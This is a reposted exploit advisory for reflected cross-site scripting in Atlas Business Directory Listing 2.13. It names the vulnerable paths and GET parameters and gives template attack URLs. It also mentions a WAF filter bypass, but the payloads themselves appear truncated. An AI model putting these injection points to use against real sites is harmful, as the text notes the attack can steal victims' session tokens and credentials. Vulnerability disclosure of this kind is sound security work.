Exploit/Advisories no image

Published on July 12th, 2023 📆 | 3680 Views ⚑

0

Atlas Business Directory Listing 2.13 Cross Site Scripting – Torchsec


iSpeech

# Exploit Title: Atlas Business Directory Listing 2.13 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 09/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/atlas/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials

Path: /atlas/home/filter_listings

GET parameter 'price-range' is vulnerable to XSS

https://website/atlas/home/filter_listings?category=family-style&&amenity=good-for-kids&&city=marseille&&price-range=790[XSS]&&video=1&&status=open





Path: /atlas/home/search

GET parameter 'search_string' is vulnerable to XSS

https://website/atlas/home/search?search_string=[XSS]&selected_city_id=&selected_category_id=11

Simple XSS Payload (Blocked by WAF) :
XSS Filter Bypass : ">

[-] Done

Source link

Tagged with:



Comments are closed.